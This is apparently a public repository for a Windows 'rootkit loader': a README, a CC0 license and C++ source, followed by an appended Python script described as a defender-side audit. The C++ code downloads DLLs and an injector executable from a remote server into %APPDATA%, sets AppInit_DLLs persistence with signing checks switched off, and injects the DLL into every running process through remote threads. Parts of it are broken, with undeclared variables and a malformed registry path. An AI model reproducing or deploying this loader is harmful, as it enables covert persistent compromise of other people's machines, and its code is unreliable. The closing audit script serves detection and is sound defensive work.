├── LICENSE
├── README.md
└── dll_rootkit_loader.cpp

/LICENSE:
--------------------------------------------------------------------------------
Creative Commons Legal Code

CC0 1.0 Universal

CREATIVE COMMONS CORPORATION IS NOT A LAW FIRM AND DOES NOT PROVIDE LEGAL SERVICES. DISTRIBUTION OF THIS DOCUMENT DOES NOT CREATE AN ATTORNEY-CLIENT RELATIONSHIP. CREATIVE COMMONS PROVIDES THIS INFORMATION ON AN "AS-IS" BASIS. CREATIVE COMMONS MAKES NO WARRANTIES REGARDING THE USE OF THIS DOCUMENT OR THE INFORMATION OR WORKS PROVIDED HEREUNDER, AND DISCLAIMS LIABILITY FOR DAMAGES RESULTING FROM THE USE OF THIS DOCUMENT OR THE INFORMATION OR WORKS PROVIDED HEREUNDER.

Statement of Purpose

The laws of most jurisdictions throughout the world automatically confer exclusive Copyright and Related Rights (defined below) upon the creator and subsequent owner(s) (each and all, an "owner") of an original work of authorship and/or a database (each, a "Work").

Certain owners wish to permanently relinquish those rights to a Work for the purpose of contributing to a commons of creative, cultural and scientific works ("Commons") that the public can reliably and without fear of later claims of infringement build upon, modify, incorporate in other works, reuse and redistribute as freely as possible in any form whatsoever and for any purposes, including without limitation commercial purposes. These owners may contribute to the Commons to promote the ideal of a free culture and the further production of creative, cultural and scientific works, or to gain reputation or greater distribution for their Work in part through the use and efforts of others.
For these and/or other purposes and motivations, and without any expectation of additional consideration or compensation, the person associating CC0 with a Work (the "Affirmer"), to the extent that he or she is an owner of Copyright and Related Rights in the Work, voluntarily elects to apply CC0 to the Work and publicly distribute the Work under its terms, with knowledge of his or her Copyright and Related Rights in the Work and the meaning and intended legal effect of CC0 on those rights.

1. Copyright and Related Rights. A Work made available under CC0 may be protected by copyright and related or neighboring rights ("Copyright and Related Rights"). Copyright and Related Rights include, but are not limited to, the following:

  i. the right to reproduce, adapt, distribute, perform, display, communicate, and translate a Work;
  ii. moral rights retained by the original author(s) and/or performer(s);
  iii. publicity and privacy rights pertaining to a person's image or likeness depicted in a Work;
  iv. rights protecting against unfair competition in regards to a Work, subject to the limitations in paragraph 4(a), below;
  v. rights protecting the extraction, dissemination, use and reuse of data in a Work;
  vi. database rights (such as those arising under Directive 96/9/EC of the European Parliament and of the Council of 11 March 1996 on the legal protection of databases, and under any national implementation thereof, including any amended or successor version of such directive); and
  vii. other similar, equivalent or corresponding rights throughout the world based on applicable law or treaty, and any national implementations thereof.

2. Waiver.
To the greatest extent permitted by, but not in contravention of, applicable law, Affirmer hereby overtly, fully, permanently, irrevocably and unconditionally waives, abandons, and surrenders all of Affirmer's Copyright and Related Rights and associated claims and causes of action, whether now known or unknown (including existing as well as future claims and causes of action), in the Work (i) in all territories worldwide, (ii) for the maximum duration provided by applicable law or treaty (including future time extensions), (iii) in any current or future medium and for any number of copies, and (iv) for any purpose whatsoever, including without limitation commercial, advertising or promotional purposes (the "Waiver"). Affirmer makes the Waiver for the benefit of each member of the public at large and to the detriment of Affirmer's heirs and successors, fully intending that such Waiver shall not be subject to revocation, rescission, cancellation, termination, or any other legal or equitable action to disrupt the quiet enjoyment of the Work by the public as contemplated by Affirmer's express Statement of Purpose.

3. Public License Fallback. Should any part of the Waiver for any reason be judged legally invalid or ineffective under applicable law, then the Waiver shall be preserved to the maximum extent permitted taking into account Affirmer's express Statement of Purpose.
In addition, to the extent the Waiver is so judged Affirmer hereby grants to each affected person a royalty-free, non transferable, non sublicensable, non exclusive, irrevocable and unconditional license to exercise Affirmer's Copyright and Related Rights in the Work (i) in all territories worldwide, (ii) for the maximum duration provided by applicable law or treaty (including future time extensions), (iii) in any current or future medium and for any number of copies, and (iv) for any purpose whatsoever, including without limitation commercial, advertising or promotional purposes (the "License"). The License shall be deemed effective as of the date CC0 was applied by Affirmer to the Work. Should any part of the License for any reason be judged legally invalid or ineffective under applicable law, such partial invalidity or ineffectiveness shall not invalidate the remainder of the License, and in such case Affirmer hereby affirms that he or she will not (i) exercise any of his or her remaining Copyright and Related Rights in the Work or (ii) assert any associated claims and causes of action with respect to the Work, in either case contrary to Affirmer's express Statement of Purpose.

4. Limitations and Disclaimers.

  a. No trademark or patent rights held by Affirmer are waived, abandoned, surrendered, licensed or otherwise affected by this document.
  b. Affirmer offers the Work as-is and makes no representations or warranties of any kind concerning the Work, express, implied, statutory or otherwise, including without limitation warranties of title, merchantability, fitness for a particular purpose, non infringement, or the absence of latent or other defects, accuracy, or the present or absence of errors, whether or not discoverable, all to the greatest extent permissible under applicable law.
  c. Affirmer disclaims responsibility for clearing rights of other persons that may apply to the Work or any use thereof, including without limitation any person's Copyright and Related Rights in the Work. Further, Affirmer disclaims responsibility for obtaining any necessary consents, permissions or other rights required for any use of the Work.
  d. Affirmer understands and acknowledges that Creative Commons is not a party to this document and has no duty or obligation with respect to this CC0 or use of the Work.
--------------------------------------------------------------------------------

/README.md:
--------------------------------------------------------------------------------
# DLL_ROOTKIT_loader

Rootkit loader for your rootkit DLL: x86/x64 system-wide DLL injection (also creates the AppInit_DLLs registry entry).

+ Changelog
  + Added first tests for Heaven's Gate; heavensgatetest_simple.cpp may work (not tested yet).
  + Removed the Heaven's Gate code since it isn't working with any library.
--------------------------------------------------------------------------------

/dll_rootkit_loader.cpp:
--------------------------------------------------------------------------------
//dont skid this leave credit - CODED BY FREAK - http://pastebin.com/u/KekSec - https://github.com/freakanonymous
//please star me on github :D
//copyright??? - Freak 01/25/2021
// hope this one works.
#pragma once
#ifndef NO_ROOTKIT
#ifndef __RKIT_LOADED
#define __RKIT_LOADED
#include
#define _WIN32_DCOM
#include
using namespace std;
#include
#include
#pragma comment(lib, "wbemuuid.lib") //WMI
#include
#include
#include
#include
#include
#include
#include
#include
#pragma comment(lib, "ntdll.lib") //for RtlAdjustPrivilege in heavens gate test
#define SE_DEBUG_PRIVILEGE 20
extern "C" NTSYSAPI NTSTATUS WINAPI RtlAdjustPrivilege(ULONG, BOOLEAN, BOOLEAN, PBOOLEAN);



/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
//**//**//**//**//**//**//**//**//*DLL_ROOTKIT_loader LIBRARY START*//**//**//**//**//**//**//**//**//**//**//**//**/
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////



char x64injectpath[MAX_PATH + 1];
char* dllhide = "$6829";
char* mutexseparator = ":";
bool IsInjected(DWORD pid)
{
    CHAR Mutant[64];
    sprintf(Mutant, "%d%s%s", pid, mutexseparator, dllhide);
    HANDLE hMu = OpenMutexA(MAXIMUM_ALLOWED, 0, Mutant);
    if (!hMu)
        return 0;
    CloseHandle(hMu);

    return 1;
}
BOOL isrunning64 = FALSE;


void inject(DWORD dwProcessId, char* dllpath32, char* dllpath64, BOOL isrunning64) {
    HANDLE h = OpenProcess(PROCESS_ALL_ACCESS, false, dwProcessId);
    BOOL is64 = FALSE;
    if (h)
    {
        if (isrunning64) {
            if (IsWow64Process(h, &is64)) {
                SHELLEXECUTEINFO ShExecInfo;
                ShExecInfo.cbSize = sizeof(SHELLEXECUTEINFO);
                ShExecInfo.fMask = SEE_MASK_NOCLOSEPROCESS;
                ShExecInfo.hwnd = NULL;
                ShExecInfo.lpVerb = NULL;
                ShExecInfo.lpFile = x64injectpath;
                char runinject[MAX_PATH * 2 + 10];
                sprintf(runinject, "-t 3 %d \"%s\"", dwProcessId, dllpath64);
                ShExecInfo.lpParameters = runinject;
                ShExecInfo.lpDirectory = NULL;
                ShExecInfo.nShow = SW_HIDE;
                ShExecInfo.hInstApp = NULL;
                ShellExecuteEx(&ShExecInfo);
                WaitForSingleObject(ShExecInfo.hProcess, INFINITE);
                return;
            }
        }

        PVOID LoadLibAddr = (PVOID)GetProcAddress(GetModuleHandleA("Kernel32.dll"), "LoadLibraryA");
        LPVOID dereercomp = VirtualAllocEx(h, NULL, strlen(dllpath32), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
        WriteProcessMemory(h, dereercomp, dllpath32, strlen(dllpath32), NULL);
        HANDLE asdc = CreateRemoteThread(h, NULL, NULL, (LPTHREAD_START_ROUTINE)LoadLibAddr, dereercomp, 0, NULL);

    }
}
class WMITask
{
protected:

    void WMIConnect(char* dllpath32, char* dllpath64, BOOL isrunning64, DWORD mypid);
    int WMIGetUserProcesses(char* dllpath32, char* dllpath64, BOOL isrunning64, DWORD mypid);

    //////////////////////////////////////////////////////
    //////////////////WMI Structs/////////////////////////
    CComPtr< IWbemLocator > locator;
    CComPtr< IWbemServices > service;
    CComPtr< IEnumWbemClassObject > enumerator;

    CComPtr< IWbemClassObject > object;

    HRESULT WMIHandle;
    ///////////////////////////////////////////////////////

public:

    //////////////////////////////////////////////////////
    /////////////////WMI Variables////////////////////////

    // WMI Vars : Process
    CString sUserProcesses;

    DWORD mypid;
    ///////////////////////////////////////////////////////

    WMITask(char* dllpath32, char* dllpath64, BOOL isrunning64, DWORD mypid);

};

// Constructor
//__________________________________________________________________________________
WMITask::WMITask(char* dllpath32, char* dllpath64, BOOL isrunning64, DWORD mypid)
{
    WMIConnect(dllpath32, dllpath64, isrunning64, mypid);
}
// WMI Handler
//_____________________________________________________________________________
void WMITask::WMIConnect(char* dllpath32, char*
dllpath64, BOOL isrunning64, DWORD mypid)
{
    // http://msdn.microsoft.com/en-us/library/aa389273(v=VS.85).aspx

    int result = 0;
    WMIHandle = CoInitializeEx(NULL, COINIT_MULTITHREADED);

    // setup process-wide security context
    WMIHandle = CoInitializeSecurity(NULL,  // we're not a server
        -1,                                 // we're not a server
        NULL,                               // we're not a server
        NULL,                               // reserved
        RPC_C_AUTHN_LEVEL_DEFAULT,          // let DCOM decide
        RPC_C_IMP_LEVEL_IMPERSONATE,
        NULL,
        EOAC_NONE,
        NULL);

    // we're going to use CComPtr<>s, whose lifetime must end BEFORE CoUninitialize is called
    // connect to WMI
    WMIHandle = CoCreateInstance(CLSID_WbemAdministrativeLocator, NULL,
        CLSCTX_INPROC_SERVER,
        IID_IWbemLocator, reinterpret_cast(&locator));

    if (FAILED(WMIHandle))
    {
        // Instantiation of IWbemLocator failed

        CoUninitialize();
        return;
    }

    // connect to local service with current credentials
    WMIHandle = locator->ConnectServer(L"root\\cimv2", NULL, NULL, NULL,
        WBEM_FLAG_CONNECT_USE_MAX_WAIT,
        NULL, NULL, &service);

    if (SUCCEEDED(WMIHandle))
    {
        WMIGetUserProcesses(dllpath32, dllpath64, isrunning64, mypid);

    }
    else {
        // Couldn't connect to service
    }
    CoUninitialize();
}


int WMITask::WMIGetUserProcesses(char* dllpath32, char* dllpath64, BOOL isrunning64, DWORD mypid)

{
    /////////////////////////////////////////////////////////////////////////////////////////
    // Vars & Class Declarations
    //

    int statusreturn = 0;
    ULONG retcnt;
    _bstr_t str;
    _bstr_t STR;
    _variant_t var_val;
    _variant_t pVal;

    CString Caption;
    CString ProcessId;
    CString ProcessStr;
    CString User;

    IWbemClassObject* pClass;
    IWbemClassObject* pwcrGetOwnerIn = NULL;
    IWbemClassObject* pwcrGetOwnerOut = NULL;
    IWbemClassObject* pOutParams = NULL;

    /////////////////////////////////////////////////////////////////////////////////////////
    // Execute
    //

    // Execute Service Query
    // --------------------------------------------------
    WMIHandle = service->ExecQuery(L"WQL", L"SELECT ProcessId FROM Win32_Process",
        WBEM_FLAG_FORWARD_ONLY | WBEM_FLAG_RETURN_IMMEDIATELY, NULL, &enumerator);
    // --------------------------------------------------
    if (SUCCEEDED(WMIHandle)) // - Check Query Result
    {
        // --------------------------------------------------
        for (;;) { // - Endless Loop, Must break manually
            // --------------------------------------------------
            WMIHandle = enumerator->Next(WBEM_INFINITE, 1L, reinterpret_cast(&object), &retcnt);
            // --------------------------------------------------
            if (SUCCEEDED(WMIHandle)) // - Check Query Result
            {
                if (retcnt > 0) // - Check if any more object vars are available
                {
                    WMIHandle = object->Get(L"ProcessId", 0, &var_val, NULL, NULL);
                    int dwProcessId = var_val.intVal;
                    if (!IsInjected(dwProcessId) && dwProcessId != mypid && dwProcessId != 0) {
                        inject(dwProcessId, dllpath32, dllpath64, isrunning64);
                    }

                }
                else {
                    statusreturn = -3; break; // Enumeration empty(emptied)
                }
            }
            else {
                statusreturn = -2; // Error in iterating through enumeration
            }
        }
    }
    else {
        statusreturn = -1; // Bad ExecQuery
    }

    // Release Memory
    // --------------------------------------------------
    VariantClear(&var_val);
    VariantClear(&pVal);
    pClass->Release();
    pwcrGetOwnerOut->Release();
    pOutParams->Release();
    object.Release();

    Caption.ReleaseBuffer();
    ProcessId.ReleaseBuffer();
    ProcessStr.ReleaseBuffer();
    User.ReleaseBuffer();

    return statusreturn;
}
#pragma comment(lib, "urlmon.lib")

void DownloadFile(char* url, char* dest) {

    HINTERNET hInet;
    hInet = InternetOpenA("wininet", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
    if (!hInet) return;
    HANDLE fh, f;

    fh = InternetOpenUrl(ih, url, NULL, 0, 0, 0);
    if (fh != NULL) {

        // open the file
        f = CreateFile(dest, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, 0);
        // make sure that our file handle is valid
        if (f < (HANDLE)1) {
            return;
        }
        char fbuff[512];
        DWORD r = 0, d = 0;
        do {
            memset(fbuff, 0, sizeof(fbuff));
            InternetReadFile(fh, fbuff, sizeof(fbuff), &r);
            WriteFile(f, fbuff, r, &d, NULL);
        } while (r > 0);
        CloseHandle(f);
    }
}/*
char *getFileContent(char * pathname) {
    ifstream hexa;
    hexa.open(pathname);
    int size = hexa.tellg();
    char* hexarray =(char*)malloc(size);

    while (!hexa.eof())
    {
        for (int i = 0; i <= size; i++)
        {

            hexarray[i] = hexa.get();
        }
    }

    hexa.close();
    return hexarray;
}*/
DWORD WINAPI rootkit(LPARAM none) {


    int err = 0;
    WSADATA WSAdata;
    if ((err = WSAStartup(MAKEWORD(2, 2), &WSAdata)) != 0)
        return 0;
    if (LOBYTE(WSAdata.wVersion) != 2 || HIBYTE(WSAdata.wVersion) != 2) {
        WSACleanup();
        return 0;
    }
    ih = InternetOpen("Mozilla/4.0 (compatible)", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);
    if (ih == NULL) ih = 0;

    HKEY hKey;
    long result = RegOpenKeyExA(
        HKEY_LOCAL_MACHINE,
        (LPCSTR)"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppInit_DLLs",
        0,
        KEY_WRITE,
        &hKey
    );
    char
dllinstallpath32[MAX_PATH + 1];
    char dllinstallpath64[MAX_PATH + 1];
    char exeinstallpath[MAX_PATH + 1];
    sprintf_s(dllinstallpath32, "%s\\%s\\%s_32.dll", std::getenv("APPDATA"), dllhide, dllhide);
    sprintf_s(dllinstallpath64, "%s\\%s\\%s_64.dll", std::getenv("APPDATA"), dllhide, dllhide);
    sprintf_s(exeinstallpath, "%s\\%s\\%s_.exe", std::getenv("APPDATA"), dllhide, dllhide);
    struct stat buffer;
    char url32[512] = { 0 };
    sprintf_s(url32, "http://%s/x86.dll", dllserver);
    if (stat(dllinstallpath32, &buffer) != 0) {
        DownloadFile(url32, dllinstallpath32);
        if (stat(dllinstallpath32, &buffer) != 0) return 2;
    }
    BOOL f64 = FALSE;
    isrunning64 = IsWow64Process(GetCurrentProcess(), &f64) && f64;
    char url64[512] = { 0 };
    char x64injectpathurl[512] = { 0 };
    if (isrunning64) {
        sprintf_s(dllinstallpath64, "%s\\%s\\%s_64.dll", std::getenv("APPDATA"), dllhide, dllhide);
        sprintf_s(x64injectpath, "%s\\%s\\%s_64i.exe", std::getenv("APPDATA"), dllhide, dllhide);
        sprintf_s(url64, "http://%s/x64.dll", dllserver);
        sprintf_s(x64injectpathurl, "http://%s/x64i.exe", dllserver);
        if (stat(dllinstallpath64, &buffer) != 0) {
            DownloadFile(url64, dllinstallpath64);
            if (stat(dllinstallpath64, &buffer) != 0) return 2;
        }
        if (stat(x64injectpath, &buffer) != 0) {
            sprintf_s(x64injectpathurl, "http://%s/x64i.exe", dllserver);
            DownloadFile(x64injectpathurl, x64injectpath);
            if (stat(x64injectpath, &buffer) != 0) return 3;
        }
    }

    if (result == ERROR_SUCCESS) {
        DWORD value0 = 0;
        DWORD value1 = 1;

        if (!isrunning64) {
            RegSetValueExA(hKey, "AppInit_DLLs", 0, REG_SZ, (BYTE*)dllinstallpath32, (strlen(dllinstallpath32) + 1) * sizeof(char));
        }
        else {
            RegSetValueExA(hKey, "AppInit_DLLs", 0, REG_SZ, (BYTE*)dllinstallpath64, (strlen(dllinstallpath64) + 1) * sizeof(char));
        }
        RegSetValueExA(hKey, "RequireSignedAppInit_DLLs", 0, REG_DWORD, (BYTE*)value0, sizeof(DWORD));
        RegSetValueExA(hKey, "LoadAppInit_DLLs", 0, REG_DWORD, (BYTE*)value1, sizeof(DWORD));
        RegCloseKey(hKey);
    }

    // check if the library has a ReflectiveLoader...
    //char *lpBuff = getFileContent(dllinstallpath
    DWORD mypid = GetCurrentProcessId(); //mypid is used for making sure we dont hook our own process
    while (1) {
        //DWORD activePID;
        //HWND activeWnd = GetActiveWindow();
        // GetWindowThreadProcessId(activeWnd, &activePID);
        // if(activePID != mypid) inject(activePID, dllinstallpath32, dllinstallpath64, isrunning64);
        WMITask(dllinstallpath32, dllinstallpath64, isrunning64, mypid);
        Sleep(150);
    }
}
#endif
#endif

/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
//**//**//**//**//**//**//**//**//*DLL_ROOTKIT_loader LIBRARY END*//**//**//**//**//**//**//**//**//**//**//**//**///
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
--------------------------------------------------------------------------------
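The script below is an added defender-side example and is not part of this repository or the author's code. It audits the three values that the loader's rootkit() routine writes under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows (AppInit_DLLs, LoadAppInit_DLLs and RequireSignedAppInit_DLLs) and recognises the "<pid>:$6829" mutex name that IsInjected() probes before injecting. The registry key, the value names and the winreg calls are Microsoft's documented ones; the sample snapshots, the severity labels and the list of user-writable directories are constructed assumptions for the demonstration.

```python
"""Audit AppInit_DLLs persistence settings (added example, not part of the loader repo)."""
import re
import sys
from typing import Dict, List, Tuple

# Documented location of the AppInit values, relative to HKEY_LOCAL_MACHINE.
APPINIT_KEY = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
APPINIT_VALUES = ("AppInit_DLLs", "LoadAppInit_DLLs", "RequireSignedAppInit_DLLs")

# The loader's IsInjected() opens a mutex named "<pid>:$6829" ("$6829" is the
# dllhide string in the source); a matching mutex on a host is an indicator.
LOADER_MUTEX_RE = re.compile(r"^\d+:\$6829$")

# Directories a legitimate AppInit DLL would not normally be loaded from; the
# loader drops its DLL under %APPDATA%\$6829\. The list is an assumption.
USER_WRITABLE_DIRS = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\")

Finding = Tuple[str, str]  # (severity, message)


def is_loader_mutex(name: str) -> bool:
    """True if a mutex name matches the loader's per-process marker pattern."""
    return LOADER_MUTEX_RE.match(name) is not None


def audit_appinit(values: Dict[str, object]) -> List[Finding]:
    """Evaluate a snapshot of the three AppInit values and return findings."""
    findings: List[Finding] = []
    load_enabled = str(values.get("LoadAppInit_DLLs", 0)) == "1"
    require_signed = values.get("RequireSignedAppInit_DLLs")
    dll_list = str(values.get("AppInit_DLLs") or "").strip()

    if load_enabled:
        findings.append(("MEDIUM", "LoadAppInit_DLLs=1: AppInit DLL loading is enabled"))
    if require_signed is not None and str(require_signed) == "0":
        findings.append(("MEDIUM", "RequireSignedAppInit_DLLs=0: unsigned AppInit DLLs are allowed"))

    # AppInit_DLLs is a space- or comma-separated list; entries with spaces are
    # expected in 8.3 form, so plain splitting is acceptable here (assumption).
    for entry in filter(None, re.split(r"[ ,;]+", dll_list)):
        if any(d in entry.lower() for d in USER_WRITABLE_DIRS):
            findings.append(("HIGH", f"AppInit_DLLs loads from a user-writable directory: {entry}"))
        else:
            findings.append(("INFO", f"AppInit_DLLs entry present, verify publisher/signature: {entry}"))
    return findings


def read_live_values(view_flag: int = 0) -> Dict[str, object]:
    """Read the values from the live registry (Windows only). Pass
    winreg.KEY_WOW64_32KEY as view_flag to inspect the Wow6432Node view
    that 32-bit processes use on a 64-bit host."""
    import winreg  # Windows-only standard-library module
    out: Dict[str, object] = {}
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, APPINIT_KEY, 0,
                        winreg.KEY_READ | view_flag) as key:
        for name in APPINIT_VALUES:
            try:
                out[name] = winreg.QueryValueEx(key, name)[0]
            except FileNotFoundError:
                pass  # value absent, nothing to report for it
    return out


# Constructed snapshot mirroring what rootkit() writes on a 64-bit host.
SAMPLE_INFECTED = {
    "AppInit_DLLs": r"C:\Users\victim\AppData\Roaming\$6829\$6829_64.dll",
    "LoadAppInit_DLLs": 1,
    "RequireSignedAppInit_DLLs": 0,
}
# Constructed snapshot of a hardened configuration.
SAMPLE_CLEAN = {"AppInit_DLLs": "", "LoadAppInit_DLLs": 0, "RequireSignedAppInit_DLLs": 1}


if __name__ == "__main__":
    snapshots = {"constructed infected sample": SAMPLE_INFECTED,
                 "constructed clean sample": SAMPLE_CLEAN}
    if sys.platform == "win32":
        snapshots["live HKLM (64-bit view)"] = read_live_values()
    for label, snap in snapshots.items():
        print(f"== {label}")
        for sev, msg in audit_appinit(snap) or [("OK", "no findings")]:
            print(f"  [{sev}] {msg}")
```

On a Windows host the script audits the live key (call read_live_values(winreg.KEY_WOW64_32KEY) as well to cover the 32-bit view); elsewhere it evaluates only the constructed samples. Note that Windows 8 and later ignore AppInit_DLLs when Secure Boot is enabled, so a populated key on such a system records an attempt at persistence rather than a working hook, and is still worth alerting on.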